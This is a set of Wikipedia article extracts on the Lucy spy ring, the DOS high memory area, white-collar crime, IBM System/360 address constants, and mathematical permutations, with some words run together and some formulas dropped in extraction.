Roessler's story was first published in 1966 by the French journalists Pierre Accoce and Pierre Quet.[6]In 1981, it was alleged byAnthony ReadandDavid Fisherthat Lucy was, at its heart, a BritishSecret Serviceoperation intended to getUltrainformation to the Soviets in a convincing way untraceable to British codebreaking operations against the Germans.[7]Stalinhad shown considerable suspicion of any information from the British aboutGerman plans to invade Russiain 1941, so anAlliedeffort to find a way to get helpful information to the Soviets in a form that would not be dismissed or, at least, not implausible. That the Soviets had, via their own espionage operations, learned of the British break into important German message traffic was not, at the time, known to the British. Various observations have suggested that Allan Foote was more than a mere radio operator: he was in a position to act as a radio interface between SIS and Roessler, and also between Roessler and Moscow; his return to the West in the 1950s was unusual in several ways; and his book was similarly troublesome. They also point out that not one of Roessler's claimed sources in Germany has been identified or has come forward. Hence their suspicion that, even more so than for most espionage operations, the Lucy ring was not what it seemed.
However, this is flatly denied byHarry Hinsley, the official historian for the British Secret Services in World War II, who stated that "there is no truth in the much-publicized claim that the British authorities made use of the ‘Lucy’ ring..to forward intelligence to Moscow".[8]
Phillip Knightleyalso dismisses the thesis that Ultra was the source of Lucy.[9]He indicates that the information was delivered very promptly (often within 24 hours) to Moscow, too fast if it had come via GCHQ Bletchley Park. Further, Ultra intelligence on the Eastern front was less than complete; many of the German messages were transmitted by landlines and wireless messages were often too garbled for timely decoding. Furthermore, theEnigmasystems employed by German forces on the Eastern Front were only broken intermittently. Knightley suggests that the source was Karel Sedlacek, a Czech military intelligence officer. Sedlacek died in London in 1967 and indicated that he received the information from one or more unidentified dissidents within the German High Command.[9]Another, but less likely possibility Knightley suggests is, that the information came from theSwiss secret service.[9]
V. E. Tarrant echoes Knightley's objections, and in addition points out that Read and Fisher's scenario was unnecessary, as Britain was already passing Ultra information to the Soviet Union following the German invasion in June 1941. While not wishing to reveal Britain's penetration of Enigma, Churchill ordered selected Ultra information to be passed via the British Military Mission in Moscow, reported as coming from "a well-placed source in Berlin," or "a reliable source".[10]However, as the Soviets showed little interest in co-operation on intelligence matters, refusing to share Soviet intelligence that would be useful to Britain (such as information on German air forces in the Eastern Front) or agreeing to use the Soviet mission in London as a transmission route, the British cut back the flow of information in the spring of 1942, and by the summer it had dwindled to a trickle. This hypothesis, that Britain lost the motivation to share intelligence with Stalin after this time, is also at variance with Read and Fisher's theory.
|
https://en.wikipedia.org/wiki/Lucy_spy_ring
|
InDOS memory management, thehigh memory area(HMA) is theRAMarea consisting of the first 65520bytesabove the one megabyte in anIBMATor compatible computer.
Inreal mode, thesegmentation architectureof theIntel8086and subsequent processors identifies memory locations with a 16-bit segment and a 16-bit offset, which is resolved into a physical address via (segment) × 16 + (offset). Although intended to address only 1Megabyte(MB) (220bytes) of memory, segment:offset addresses atFFFF:0010and beyond reference memory beyond 1 MB (FFFF0 + 0010 = 100000). So, on an80286and subsequent processors, this mode can actually address the first 65520 bytes of extended memory as part of the 64 KB range starting 16 bytes before the 1 MB mark—FFFF:0000 (0xFFFF0)toFFFF:FFFF (0x10FFEF). The Intel8086and8088processors, with only 1 MB of memory and only 20address lines, wrapped around at the 20th bit, so that addressFFFF:0010was equivalent to0000:0000.[1]
To allow running existing DOS programs which relied on this feature to accesslow memoryon their newer IBMPC ATcomputers, IBM added specialcircuitryon themotherboardto simulate the wrapping around. This circuit was a simplelogic gatewhich could disconnect the microprocessor's 21st addressing line,A20, from the rest of the motherboard. This gate could be controlled, initially through thekeyboard controller, to allow running programs which wanted to access the entire RAM.[1]
So-calledA20 handlerscould control the addressing mode dynamically,[1]thereby allowing programs to load themselves into the 1024–1088 KB region and run in real mode.[1]
Code suitable to be executed in the HMA must either be coded to beposition-independent(using only relative references),[2][1]be compiled to work at the specific addresses in the HMA (typically allowing only one or at most two pieces of code to share the HMA), or it must be designed to beparagraph boundaryor evenoffset relocatable(with all addresses being fixed up during load).[2][1]
Before code (or data) in the HMA can be addressed by the CPU, the corresponding driver must ensure that the HMA is mapped in. This requires that any such requests are tunneled through astubremaining in memory outside the HMA, which would invoke the A20 handler in order to (temporarily) enable theA20 gate.[2][1]If the driver does not exhibit any public data structures and only uses interrupts or calls already controlled by the underlying operating system, it might be possible to register the driver with the system in a way so that the system will take care of A20 itself thereby eliminating the need for a separate stub.[1][nb 1]
The first user of the HMA amongMicrosoftproducts wasWindows/2862.1 in 1988, which introduced theHIMEM.SYSdevice driver. Starting in 1990 withDigital Research'sDR DOS 5.0[3](viaHIDOS.SYS /BDOS=FFFF[4]andCONFIG.SYSHIDOS=ON) and since 1991 withMS-DOS 5.0[3](viaDOS=HIGH), parts of the operating system'sBIOSand kernel could be loaded into the HMA as well,[3][5]freeing up to 46 KB ofconventional memory.[1]Other components, such as device drivers andterminate-and-stay-resident programs(TSRs), could at least be loaded into theupper memory area(UMA), but not into the HMA. Under DOS 5.0 and higher, withDOS=HIGH, the system additionally attempted to move the disk buffers into the HMA.[5]UnderDR DOS 6.0(1991) and higher, the disk buffers (viaHIBUFFERS, and later alsoBUFFERSHIGH), parts of the command processorCOMMAND.COMas well as several specialself-relocatingdrivers likeKEYB,NLSFUNCandSHAREcould load into the HMA as well (using their/MHoption), thereby freeing up even more conventional memory and upper memory for conventional DOS software to work with.[1]TASKMAXseems to have relocated parts of itself into the HMA as well.[6][7]Novell'sNLCACHEfromNetWare Liteand early versions ofNWCACHEfromPersonal NetWareandNovell DOS 7could utilize the HMA as well.[8][9][7]Under MS-DOS/PC DOS, a ca. 2 KB shared portion of COMMAND.COM can be relocated into the HMA,[10]as well asDISPLAY.SYSbitmaps for preparedcodepages.[10][11]UnderMS-DOS 6.2(1993) and higher, a ca. 5 KB portion ofDBLSPACE.BIN/DRVSPACE.BINcan coexist with DOS in the HMA (unlessDBLSPACE/DRVSPACE/NOHMAis invoked).[5][12]UnderPC DOS 7.0(1995) and2000,DOSKEYloads into the HMA (if available),[13]and SHARE can be loaded into the HMA as well (unless its/NOHMAoption is given).[13]UnderMS-DOS 7.0(1995) to8.0(2000), parts of the HMA are also used as a scratchpad to hold a growing data structure recording various properties of the loaded real-mode drivers.[7][14][15]
|
https://en.wikipedia.org/wiki/High_memory_area
|
The term "white-collar crime" refers to financially motivated, nonviolent or non-directly violentcrimecommitted by individuals, businesses and government professionals.[1]The crimes are believed to be committed by middle- or upper-class individuals for financial gains.[2]It was first defined by the sociologistEdwin Sutherlandin 1939 as "a crime committed by a person of respectability and high social status in the course of their occupation".[3]Typical white-collar crimes could includewage theft,fraud,bribery,Ponzi schemes,insider trading,labor racketeering,embezzlement,cybercrime,copyright infringement,money laundering,identity theft, andforgery.[4]White-collar crime overlaps withcorporate crime.
Modern criminology generally prefers to classify the type of crime and the topic:
The types of crime committed are a function of what is available to the potential offender. Thus, those employed in relatively unskilled environments have fewer opportunities to exploit than those who work in situations where large financial transactions occur.[9]Blue-collar crime tends to be more obvious and thus attracts more active police attention such asvandalismorshoplifting.[10]In contrast, white-collar employees can incorporate legitimate and criminal behavior, thus making themselves less obvious when committing the crime. Therefore, blue-collar crime will more often use physical force. In contrast, the corporate world, the identification of a victim is less obvious and the issue of reporting is complicated by a culture of commercial confidentiality to protectshareholdervalue. It is estimated that a great deal of white-collar crime is undetected or, if detected, it is not reported.
Corporate crime benefits the corporation (company or other type of business organization), rather than individuals. It may, however, result from the decisions of high-ranking individuals within the corporation.[11]Corporations are not, unlike individuals, litigated in criminal courts, which means the term "crime" does not really apply.[12]Litigation usually takes place in civil courts or by institutions with jurisdiction over specific types of offences, such as theU.S. Securities and Exchange Commissionwhich litigates violations of financial market and investment statutes.[13]
State-corporate crime is “illegal or socially injurious actions that occur when one or more institutions or political governance pursue a goal in direct cooperation with one or more institutions of economic production and distribution.”[14]The negotiation of agreements between a state and a corporation will be at a relatively senior level on both sides, this is almost exclusively a white-collar "situation" which offers the opportunity for crime. Although law enforcement claims to have prioritized white-collar crime,[15]evidence shows that it continues to be a low priority.[16]
When senior levels of a corporation engage in criminal activity using the company this is sometimes calledcontrol fraud.
Organizedtransnational crimeis organized criminal activity that takes place across national jurisdictions, and with advances in transportation and information technology, law enforcement officials and policymakers have needed to respond to this form of crime on a global scale.[17]Some examples includehuman trafficking,money laundering,drug smuggling, illegal arms dealing,terrorism, andcybercrime. Although it is impossible to precisely gauge transnational crime, theMillennium Project, an international think tank, assembled statistics on several aspects of transnational crime in 2009:[18]
When a white-collar criminal turns violent, it becomes red-collar crime. This can take the form of killing a witness in a fraud trial to silence them or murdering someone who exposed the fraud, such as a journalist, detective or whistleblower. Perri and Lichtenwald defined red-collar crime as follows:
“This sub-group is referred to as red-collar criminals because they straddle both the white-collar crime arena and, eventually, the violent crime arena. In circumstances where there is the threat of detection, red-collar criminals commit brutal acts of violence to silence the people who have detected their fraud and to prevent further disclosure.”[19]
According to a 2018 report by theBureau of Labor Statistics, homicide is the third highest cause of death in the American workplace.[20][21]The Atlantic magazine reported that red-collar criminals often have traits of narcissism and psychopathy, which ironically, are seen as desirable qualities in the recruitment process, even though it puts a company at risk of employing a white-collar criminal.
One investigator,Richard G. Brody, said that the murders might be difficult to detect, being mistaken for accidents or suicides:
“Whenever I read about high-profile executives who are found dead, I immediately think red-collar crime,” he said. “Lots of people are getting away with murder.”
Occupational crime is “any act punishable by law that is committed through opportunity created on the course of an occupation that is legal.”[22]Individuals may commit crimes during employment or unemployment. The two most common forms aretheftandfraud. Theft can be of varying degrees, from a pencil to furnishings to a car.Insider trading, the trading of stock by someone with access to publicly unavailable information, is a type of fraud.[18]
The crimes related to the national interests consist mainly of treason. In the modern world, there are a lot of nations which divide crimes into some laws. "Crimes Related to Inducement of Foreign Aggression" is the crime of communicating withalienssecretly to cause foreign aggression or menace. "Crimes Related to Foreign Aggression" is the treason of cooperating with foreign aggression positively regardless of the national inside and outside. "Crimes Related to Insurrection" is the internal treason. Depending on the country, criminal conspiracy is added to these. One example isJho Low, a Malaysian businessman and international fugitive who stole billions of US dollars from1MDB, a Malaysiansovereign wealth fund.[23]
According to a 2016 American study,[24]
A considerable percentage of white-collar offenders are gainfully employed middle-aged Caucasian men who usually commit their first white-collar offense sometime between their late thirties through their mid-forties and appear to have middle-class backgrounds. Most have some higher education, are married, and have moderate to strong ties to community, family, and religious organizations. Whitecollar offenders usually have a criminal history, including infractions that span the spectrum of illegality, but many do not overindulge in vice. Recent research examining the five-factor personality trait model determined that white-collar offenders tend to be more neurotic and less agreeable and conscientious than their non-criminal counterparts.
In the United States, sentences for white-collar crimes may include a combination ofimprisonment,fines,restitution,community service,disgorgement,probation, or other alternative punishment.[25][26]These punishments grew harsher after theJeffrey SkillingandEnron scandal, when theSarbanes–Oxley Actof 2002 was passed by theUnited States Congressand signed into law by PresidentGeorge W. Bush, defining new crimes and increasing the penalties for crimes such asmail and wire fraud. Sometimes punishment for these crimes could be hard to determine due to the fact that convincing the courts that what the offender has done is challenging within itself.[27]In other countries, such asChina, white-collar criminals can be given thedeath penaltyunder aggravating circumstances,[28]yet some countries have a maximum of 10–25 years imprisonment. Certain countries likeCanadaconsider the relationship between the parties to be a significant feature of a sentence when there is a breach of trust component involved.[29]Questions aboutsentencing disparityin white-collar crime continue to be debated.[30]TheFBI, concerned with identifying this type of offense, collects statistical information on several different fraud offenses (swindles and cons, credit card or ATM fraud, impersonation, welfare fraud, and wire fraud), bribery, counterfeiting and forgery, and embezzlement.[31]
In the United States, the longest sentences for white-collar crimes have included the following:Sholam Weiss(845 years for racketeering, wire fraud and money laundering in connection with the collapse ofNational Heritage Life Insurance Company); Norman Schmidt and Charles Lewis (330 years and 30 years, respectively, for "high-yield investment" scheme);Bernard Madoff(150 years for$65 billion fraud scheme); Frederick Brandau (55 years for $117 millionPonzi scheme); Martin Sigillito (40 years for $56 million Ponzi scheme); Eduardo Masferrer (30 years for accounting fraud); Chalana McFarland (30 years formortgage fraudscheme); Lance Poulsen (30 years for $2.9 billion fraud).[32]
From the perspective of an offender, the easiest targets to entrap in"white collar"crime are those with a certain degree of vulnerability or those with symbolic or emotional value to the offender.[33]Examples of these people can be family members, clients, and close friends who are wrapped up in personal or business proceedings with the offender. The way that most criminal operations are conducted is through a series of different particular techniques. In this case, a technique is a certain way to complete a desired task. When one is committing a crime, whether it be shoplifting or tax fraud, it is always easier to successfully pull off the task with experience in the technique. Shoplifters who are experienced at stealing in plain sight are much more successful than those who do not know how to steal. The major difference between a shoplifter and someone committing a white-collar crime is that the techniques used are not physical but instead consist of acts like talking on the phone, writing, and entering data.[33]
Often these criminals utilize the "blame game theory", a theory in which certain strategies are utilized by an organization or business and its members in order to strategically shift blame by pushing responsibility to others or denying misconduct.[34]This theory is particularly used in terms of organizations and indicates that offenders often do not take the blame for their actions. Many members of organizations will try to absolve themselves of responsibility when things go wrong.[35]
Forbes Magazine lays out four theories for what leads a criminal to commit a "white collar" crime.[36]The first is that there are poorly designed job incentives for the criminal. Most finance professionals are given a certain type of compensation or reward for short-term mass profits. If a company incentivizes an employee to help commit a crime, such as assisting in a Ponzi Scheme, many employees will partake in order to receive the reward or compensation. Often, this compensation is given in the form of a cash "bonus" on top of their salaries. By doing a task in order to receive a reward, many employees feel as though they are not responsible for the crime, as they have not ordered it. The "blame game theory" comes into play as those being asked to carry out illegal activities feel as though they can place the blame on their bosses instead of themselves. The second theory is that the company's management is very relaxed when it comes to enforcing ethics. If unethical practices are already commonplace in the business, employees will see that as a "green light" to conduct unethical and unlawful business practices to further the business. This idea also ties into Forbes' third theory, that most stock traders see unethical practices as harmless. Many see white-collar crime as a victimless crime, which is not necessarily true. Since many of these stock traders cannot see the victims of their crimes, it seems as if it hurts no one. The last theory is that many firms have unrealistic, large goals. They preach the mentality that employees should "do what it takes".[36]
|
https://en.wikipedia.org/wiki/White-collar_crime
|
InIBM System/360through present dayz/Architecture, anaddress constantor"adcon"is anassembly languagedata typewhich contains theaddressof a location incomputer memory. An address constant can be one, two, three or four bytes long, although an adcon of less than four bytes is conventionally used to hold an expression for a small integer such as a length, a relative address, or an index value, and does not represent an address at all. Address constants are defined using an assembler language"DC"statement.
Other computer systems have similar facilities, although different names may be used.
Aadcons normally store a four byte relocatable address, however it is possible to specify the length of the constant. For example,AL1(stuff)defines a one-byte adcon, useful mainly for small constants with relocatable values. Other adcon types can similarly have length specification.
Vtype adcons store an external reference to be resolved by thelink-editor.
Yis used for two byte (halfword) addresses. 'Y' adcons can directly address up to 32K bytes of storage, and are not widely used since early System/360 assemblers did not support a 'Y' data type. EarlyDOS/360andBOS/360systems made more use of Y adcons, since the machines these systems ran on had limited storage. The notation 'AL2(value)' is now usually used in preference to 'Y(value)' to define a 16 bit value.
Qaddress constants contain not actual addresses but adisplacementin theExternal Dummy Section– similar to the LinuxGlobal Offset Table(seePosition-independent code). AJadcon is set by the linkage editor to hold the cumulative length of the External Dummy Section, and does not actually contain an address.
Other types of address constants areRwhich had special significance forTSS/360to address thePSECT, andS, which stores an address inbase-displacementformat – a 16 bit value containing a four bit general register number and a twelve bit displacement, the same format as addresses are encoded in instructions.
System zsupports typesAD,JD,QD, andVD, which represent 8 byte (doubleword) versions of types 'A', 'J', 'Q', and 'V' to hold 64 bit addresses.
Thenominal valueof the 'DC' is a list of expressions enclosed in parentheses. Expressions can beabsolute,relocatable, orcomplex relocatable.
An absolute expression can be completely evaluated at assembly time and does not require further processing by the linkage editor. For example,DC A(4900796)has an absolute nominal value.
A relocatable expression is one that contains one or more terms that requirerelocationby the linkage editor when the program ls linked, for example, in the following code 'ACON' has a relocatable nominal value.
A complex relocatable expression contains terms that relate to addresses in different source modules. For example,DC A(X-Y)where 'X' and 'Y' are in different modules.
All these are valid adcon's:-
|
https://en.wikipedia.org/wiki/Address_constant
|
Inmathematics, apermutationof asetcan mean one of two different things:
An example of the first meaning is the six permutations (orderings) of the set {1, 2, 3}: written astuples, they are (1, 2, 3), (1, 3, 2), (2, 1, 3), (2, 3, 1), (3, 1, 2), and (3, 2, 1).Anagramsof a word whose letters are all different are also permutations: the letters are already ordered in the original word, and the anagram reorders them. The study of permutations offinite setsis an important topic incombinatoricsandgroup theory.
Permutations are used in almost every branch of mathematics and in many other fields of science. Incomputer science, they are used for analyzingsorting algorithms; inquantum physics, for describing states of particles; and inbiology, for describingRNAsequences.
The number of permutations ofndistinct objects isnfactorial, usually written asn!, which means the product of all positive integers less than or equal ton.
According to the second meaning, a permutation of asetSis defined as abijectionfromSto itself.[2][3]That is, it is afunctionfromStoSfor which every element occurs exactly once as animagevalue. Such a functionσ:S→S{\displaystyle \sigma :S\to S}is equivalent to the rearrangement of the elements ofSin which each elementiis replaced by the correspondingσ(i){\displaystyle \sigma (i)}. For example, the permutation (3, 1, 2) corresponds to the functionσ{\displaystyle \sigma }defined asσ(1)=3,σ(2)=1,σ(3)=2.{\displaystyle \sigma (1)=3,\quad \sigma (2)=1,\quad \sigma (3)=2.}The collection of all permutations of a set form agroupcalled thesymmetric groupof the set. Thegroup operationis thecomposition of functions(performing one rearrangement after the other), which results in another function (rearrangement). The properties of permutations do not depend on the nature of the elements being permuted, only on their number, so one often considers the standard setS={1,2,…,n}{\displaystyle S=\{1,2,\ldots ,n\}}.
In elementary combinatorics, thek-permutations, orpartial permutations, are the ordered arrangements ofkdistinct elements selected from a set. Whenkis equal to the size of the set, these are the permutations in the previous sense.
Permutation-like objects calledhexagramswere used in China in theI Ching(Pinyin: Yi Jing) as early as 1000 BC.
In Greece,Plutarchwrote thatXenocratesof Chalcedon (396–314 BC) discovered the number of different syllables possible in the Greek language. This would have been the first attempt on record to solve a difficult problem in permutations and combinations.[4]
Al-Khalil(717–786), anArab mathematicianandcryptographer, wrote theBook of Cryptographic Messages. It contains the first use of permutations and combinations, to list all possibleArabicwords with and without vowels.[5]
The rule to determine the number of permutations ofnobjects was known in Indian culture around 1150 AD. TheLilavatiby the Indian mathematicianBhāskara IIcontains a passage that translates as follows:
The product of multiplication of the arithmetical series beginning and increasing by unity and continued to the number of places, will be the variations of number with specific figures.[6]
In 1677,Fabian Stedmandescribed factorials when explaining the number of permutations of bells inchange ringing. Starting from two bells: "first,twomust be admitted to be varied in two ways", which he illustrates by showing 1 2 and 2 1.[7]He then explains that with three bells there are "three times two figures to be produced out of three" which again is illustrated. His explanation involves "cast away 3, and 1.2 will remain; cast away 2, and 1.3 will remain; cast away 1, and 2.3 will remain".[8]He then moves on to four bells and repeats the casting away argument showing that there will be four different sets of three. Effectively, this is a recursive process. He continues with five bells using the "casting away" method and tabulates the resulting 120 combinations.[9]At this point he gives up and remarks:
Now the nature of these methods is such, that the changes on one number comprehends the changes on all lesser numbers, ... insomuch that a compleat Peal of changes on one number seemeth to be formed by uniting of the compleat Peals on all lesser numbers into one entire body;[10]
Stedman widens the consideration of permutations; he goes on to consider the number of permutations of the letters of the alphabet and of horses from a stable of 20.[11]
A first case in which seemingly unrelated mathematical questions were studied with the help of permutations occurred around 1770, whenJoseph Louis Lagrange, in the study of polynomial equations, observed that properties of the permutations of therootsof an equation are related to the possibilities to solve it. This line of work ultimately resulted, through the work ofÉvariste Galois, inGalois theory, which gives a complete description of what is possible and impossible with respect to solving polynomial equations (in one unknown) by radicals. In modern mathematics, there are many similar situations in which understanding a problem requires studying certain permutations related to it.
The study of permutations as substitutions on n elements led to the notion of group as algebraic structure, through the works ofCauchy(1815 memoir).
Permutations played an important role in thecryptanalysis of the Enigma machine, a cipher device used byNazi GermanyduringWorld War II. In particular, one important property of permutations, namely, that two permutations are conjugate exactly when they have the same cycle type, was used by cryptologistMarian Rejewskito break the German Enigma cipher in turn of years 1932-1933.[12][13]
In mathematics texts it is customary to denote permutations using lowercase Greek letters. Commonly, eitherα,β,γ{\displaystyle \alpha ,\beta ,\gamma }orσ,τ,ρ,π{\displaystyle \sigma ,\tau ,\rho ,\pi }are used.[14]
A permutation can be defined as abijection(an invertible mapping, a one-to-one and onto function) from a setSto itself:
σ:S⟶∼S.{\displaystyle \sigma :S\ {\stackrel {\sim }{\longrightarrow }}\ S.}
Theidentity permutationis defined byσ(x)=x{\displaystyle \sigma (x)=x}for all elementsx∈S{\displaystyle x\in S}, and can be denoted by the number1{\displaystyle 1},[a]byid=idS{\displaystyle {\text{id}}={\text{id}}_{S}}, or by a single 1-cycle (x).[15][16]The set of all permutations of a set withnelements forms thesymmetric groupSn{\displaystyle S_{n}}, where thegroup operationiscomposition of functions. Thus for two permutationsσ{\displaystyle \sigma }andτ{\displaystyle \tau }in the groupSn{\displaystyle S_{n}}, their productπ=στ{\displaystyle \pi =\sigma \tau }is defined by:
π(i)=σ(τ(i)).{\displaystyle \pi (i)=\sigma (\tau (i)).}
Composition is usually written without a dot or other sign. In general, composition of two permutations is notcommutative:τσ≠στ.{\displaystyle \tau \sigma \neq \sigma \tau .}
As a bijection from a set to itself, a permutation is a function thatperformsa rearrangement of a set, termed anactive permutationorsubstitution. An older viewpoint sees a permutation as an ordered arrangement or list of all the elements ofS, called apassive permutation.[17]According to this definition, all permutations in§ One-line notationare passive. This meaning is subtly distinct from how passive (i.e.alias) is used inActive and passive transformationand elsewhere,[18][19]which would consider all permutations open to passive interpretation (regardless of whether they are in one-line notation, two-line notation, etc.).
A permutationσ{\displaystyle \sigma }can be decomposed into one or more disjointcycleswhich are theorbitsof the cyclic group⟨σ⟩={1,σ,σ2,…}{\displaystyle \langle \sigma \rangle =\{1,\sigma ,\sigma ^{2},\ldots \}}actingon the setS. A cycle is found by repeatedly applying the permutation to an element:x,σ(x),σ(σ(x)),…,σk−1(x){\displaystyle x,\sigma (x),\sigma (\sigma (x)),\ldots ,\sigma ^{k-1}(x)}, where we assumeσk(x)=x{\displaystyle \sigma ^{k}(x)=x}. A cycle consisting ofkelements is called ak-cycle. (See§ Cycle notationbelow.)
Afixed pointof a permutationσ{\displaystyle \sigma }is an elementxwhich is taken to itself, that isσ(x)=x{\displaystyle \sigma (x)=x}, forming a 1-cycle(x){\displaystyle (\,x\,)}. A permutation with no fixed points is called aderangement. A permutation exchanging two elements (a single 2-cycle) and leaving the others fixed is called atransposition.
Several notations are widely used to represent permutations conveniently.Cycle notationis a popular choice, as it is compact and shows the permutation's structure clearly. This article will use cycle notation unless otherwise specified.
Cauchy'stwo-line notation[20][21]lists the elements ofSin the first row, and the image of each element below it in the second row. For example, the permutation ofS= {1, 2, 3, 4, 5, 6} given by the function
σ(1)=2,σ(2)=6,σ(3)=5,σ(4)=4,σ(5)=3,σ(6)=1{\displaystyle \sigma (1)=2,\ \ \sigma (2)=6,\ \ \sigma (3)=5,\ \ \sigma (4)=4,\ \ \sigma (5)=3,\ \ \sigma (6)=1}
can be written as
The elements ofSmay appear in any order in the first row, so this permutation could also be written:
If there is a "natural" order for the elements ofS,[b]sayx1,x2,…,xn{\displaystyle x_{1},x_{2},\ldots ,x_{n}}, then one uses this for the first row of the two-line notation:
Under this assumption, one may omit the first row and write the permutation inone-line notationas
that is, as an ordered arrangement of the elements ofS.[22][23]Care must be taken to distinguish one-line notation from the cycle notation described below: a common usage is to omit parentheses or other enclosing marks for one-line notation, while using parentheses for cycle notation. The one-line notation is also called thewordrepresentation.[24]
The example above would then be:
σ=(123456265431)=265431.{\displaystyle \sigma ={\begin{pmatrix}1&2&3&4&5&6\\2&6&5&4&3&1\end{pmatrix}}=265431.}
(It is typical to use commas to separate these entries only if some have two or more digits.)
This compact form is common in elementarycombinatoricsandcomputer science. It is especially useful in applications where the permutations are to be compared aslarger or smallerusinglexicographic order.
Cycle notation describes the effect of repeatedly applying the permutation on the elements of the setS, with an orbit being called acycle. The permutation is written as a list of cycles; since distinct cycles involvedisjointsets of elements, this is referred to as "decomposition into disjoint cycles".
To write down the permutationσ{\displaystyle \sigma }in cycle notation, one proceeds as follows:
Also, it is common to omit 1-cycles, since these can be inferred: for any elementxinSnot appearing in any cycle, one implicitly assumesσ(x)=x{\displaystyle \sigma (x)=x}.[25]
Following the convention of omitting 1-cycles, one may interpret an individual cycle as a permutation which fixes all the elements not in the cycle (acyclic permutationhaving only one cycle of length greater than 1). Then the list of disjoint cycles can be seen as the composition of these cyclic permutations. For example, the one-line permutationσ=265431{\displaystyle \sigma =265431}can be written in cycle notation as:
σ=(126)(35)(4)=(126)(35).{\displaystyle \sigma =(126)(35)(4)=(126)(35).}
This may be seen as the compositionσ=κ1κ2{\displaystyle \sigma =\kappa _{1}\kappa _{2}}of cyclic permutations:
κ1=(126)=(126)(3)(4)(5),κ2=(35)=(35)(1)(2)(6).{\displaystyle \kappa _{1}=(126)=(126)(3)(4)(5),\quad \kappa _{2}=(35)=(35)(1)(2)(6).}
While permutations in general do not commute, disjoint cycles do; for example:
σ=(126)(35)=(35)(126).{\displaystyle \sigma =(126)(35)=(35)(126).}
Also, each cycle can be rewritten from a different starting point; for example,
σ=(126)(35)=(261)(53).{\displaystyle \sigma =(126)(35)=(261)(53).}
Thus one may write the disjoint cycles of a given permutation in many different ways.
A convenient feature of cycle notation is that inverting the permutation is given by reversing the order of the elements in each cycle. For example,
σ−1=(A2(126)(35))−1=(621)(53).{\displaystyle \sigma ^{-1}=\left({\vphantom {A^{2}}}(126)(35)\right)^{-1}=(621)(53).}
In some combinatorial contexts it is useful to fix a certain order for the elements in the cycles and of the (disjoint) cycles themselves.Miklós Bónacalls the following ordering choices thecanonical cycle notation:
For example,(513)(6)(827)(94){\displaystyle (513)(6)(827)(94)}is a permutation ofS={1,2,…,9}{\displaystyle S=\{1,2,\ldots ,9\}}in canonical cycle notation.[26]
Richard Stanleycalls this the "standard representation" of a permutation,[27]and Martin Aigner uses "standard form".[24]Sergey Kitaevalso uses the "standard form" terminology, but reverses both choices; that is, each cycle lists its minimal element first, and the cycles are sorted in decreasing order of their minimal elements.[28]
There are two ways to denote the composition of two permutations. In the most common notation,σ⋅τ{\displaystyle \sigma \cdot \tau }is the function that maps any elementxtoσ(τ(x)){\displaystyle \sigma (\tau (x))}. The rightmost permutation is applied to the argument first,[29]because the argument is written to the right of the function.
Adifferentrule for multiplying permutations comes from writing the argument to the left of the function, so that the leftmost permutation acts first.[30][31][32]In this notation, the permutation is often written as an exponent, soσacting onxis writtenxσ; then the product is defined byxσ⋅τ=(xσ)τ{\displaystyle x^{\sigma \cdot \tau }=(x^{\sigma })^{\tau }}. This article uses the first definition, where the rightmost permutation is applied first.
Thefunction compositionoperation satisfies the axioms of agroup. It isassociative, meaning(ρσ)τ=ρ(στ){\displaystyle (\rho \sigma )\tau =\rho (\sigma \tau )}, and products of more than two permutations are usually written without parentheses. The composition operation also has anidentity element(the identity permutationid{\displaystyle {\text{id}}}), and each permutationσ{\displaystyle \sigma }has an inverseσ−1{\displaystyle \sigma ^{-1}}(itsinverse function) withσ−1σ=σσ−1=id{\displaystyle \sigma ^{-1}\sigma =\sigma \sigma ^{-1}={\text{id}}}.
The concept of a permutation as an ordered arrangement admits several generalizations that have been calledpermutations, especially in older literature.
In older literature and elementary textbooks, ak-permutation ofn(sometimes called apartial permutation,sequence without repetition,variation, orarrangement) means an ordered arrangement (list) of ak-element subset of ann-set.[c][33][34]The number of suchk-permutations (k-arrangements) ofn{\displaystyle n}is denoted variously by such symbols asPkn{\displaystyle P_{k}^{n}},nPk{\displaystyle _{n}P_{k}},nPk{\displaystyle ^{n}\!P_{k}},Pn,k{\displaystyle P_{n,k}},P(n,k){\displaystyle P(n,k)}, orAnk{\displaystyle A_{n}^{k}},[35]computed by the formula:[36]
which is 0 whenk>n, and otherwise is equal to
The product is well defined without the assumption thatn{\displaystyle n}is a non-negative integer, and is of importance outside combinatorics as well; it is known as thePochhammer symbol(n)k{\displaystyle (n)_{k}}or as thek{\displaystyle k}-th falling factorial powernk_{\displaystyle n^{\underline {k}}}:
P(n,k)=nPk=(n)k=nk_.{\displaystyle P(n,k)={_{n}}P_{k}=(n)_{k}=n^{\underline {k}}.}
This usage of the termpermutationis closely associated with the termcombinationto mean a subset. Ak-combinationof a setSis ak-element subset ofS: the elements of a combination are not ordered. Ordering thek-combinations ofSin all possible ways produces thek-permutations ofS. The number ofk-combinations of ann-set,C(n,k), is therefore related to the number ofk-permutations ofnby:
These numbers are also known asbinomial coefficients, usually denoted(nk){\displaystyle {\tbinom {n}{k}}}:
C(n,k)=nCk=(nk).{\displaystyle C(n,k)={_{n}}C_{k}={\binom {n}{k}}.}
Ordered arrangements ofkelements of a setS, where repetition is allowed, are calledk-tuples. They have sometimes been referred to aspermutations with repetition, although they are not permutations in the usual sense. They are also calledwordsorstringsover the alphabetS. If the setShasnelements, the number ofk-tuples overSisnk.{\displaystyle n^{k}.}
IfMis a finitemultiset, then amultiset permutationis an ordered arrangement of elements ofMin which each element appears a number of times equal exactly to its multiplicity inM. Ananagramof a word having some repeated letters is an example of a multiset permutation.[d]If the multiplicities of the elements ofM(taken in some order) arem1{\displaystyle m_{1}},m2{\displaystyle m_{2}}, ...,ml{\displaystyle m_{l}}and their sum (that is, the size ofM) isn, then the number of multiset permutations ofMis given by themultinomial coefficient,[37]
For example, the number of distinct anagrams of the word MISSISSIPPI is:[38]
Ak-permutationof a multisetMis a sequence ofkelements ofMin which each element appearsa number of times less than or equal toits multiplicity inM(an element'srepetition number).
Permutations, when considered as arrangements, are sometimes referred to aslinearly orderedarrangements. If, however, the objects are arranged in a circular manner this distinguished ordering is weakened: there is no "first element" in the arrangement, as any element can be considered as the start. An arrangement of distinct objects in a circular manner is called acircular permutation.[39][e]These can be formally defined asequivalence classesof ordinary permutations of these objects, for theequivalence relationgenerated by moving the final element of the linear arrangement to its front.
Two circular permutations are equivalent if one can be rotated into the other. The following four circular permutations on four letters are considered to be the same.
The circular arrangements are to be read counter-clockwise, so the following two are not equivalent since no rotation can bring one to the other.
There are (n– 1)! circular permutations of a set withnelements.
The number of permutations ofndistinct objects isn!.
